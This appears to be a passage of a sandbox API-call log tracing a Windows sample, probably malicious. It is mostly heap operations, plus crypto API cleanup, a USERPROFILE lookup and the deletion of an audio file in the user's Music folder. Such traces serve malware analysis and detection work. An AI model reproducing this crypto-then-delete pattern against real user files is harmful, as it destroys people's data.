1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0245.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0245.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0245.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0245.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0245.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.544] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0245.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0245.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.545] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0245.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0245.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0245.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.547] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0245.547] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0245.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0245.548] FreeLibrary (hLibModule=0x756e0000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0245.548] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.548] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0245.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0245.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0245.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.549] CloseHandle (hObject=0x2d0) returned 1 [0245.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0245.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0245.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0245.555] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0245.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0245.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0245.555] CloseHandle (hObject=0x2a0) returned 1 [0245.560] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0245.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0245.564] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0245.564] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0245.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0245.565] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav", lpFilePart=0x8cedf4*="J0 iAXcBYZXSdt.wav") returned 0x28 [0245.565] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav" (normalized: "c:\\users\\fd1hvy\\music\\j0 iaxcbyzxsdt.wav")) returned 0x20 [0245.565] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63b00, ftCreationTime.dwHighDateTime=0x1d5e891, ftLastAccessTime.dwLowDateTime=0x4166dab0, ftLastAccessTime.dwHighDateTime=0x1d5eea2, ftLastWriteTime.dwLowDateTime=0x4166dab0, ftLastWriteTime.dwHighDateTime=0x1d5eea2, nFileSizeHigh=0x0, nFileSizeLow=0x10d6c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="J0 iAXcBYZXSdt.wav", cAlternateFileName="J0IAXC~1.WAV")) returned 0xa87250 [0245.565] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav" (normalized: "c:\\users\\fd1hvy\\music\\j0 iaxcbyzxsdt.wav")) returned 1 [0245.631] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63b00, ftCreationTime.dwHighDateTime=0x1d5e891, ftLastAccessTime.dwLowDateTime=0x4166dab0, ftLastAccessTime.dwHighDateTime=0x1d5eea2, ftLastWriteTime.dwLowDateTime=0x4166dab0, ftLastWriteTime.dwHighDateTime=0x1d5eea2, nFileSizeHigh=0x0, nFileSizeLow=0x10d6c, dwReserved0=0x1, dwReserved1=0x1c, cFileName="J0 iAXcBYZXSdt.wav", cAlternateFileName="J0IAXC~1.WAV")) returned 0 [0245.631] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0245.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0245.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0245.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0245.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0245.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0245.631] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0245.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0245.632] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e54858 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0245.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e58910 [0245.632] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav", lpFilePart=0x8cf650*="J0 iAXcBYZXSdt.wav") returned 0x28 [0245.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0245.632] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav" (normalized: "c:\\users\\fd1hvy\\music\\j0 iaxcbyzxsdt.wav")) returned 0xffffffff [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0245.633] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0245.633] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.633] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0245.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0245.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 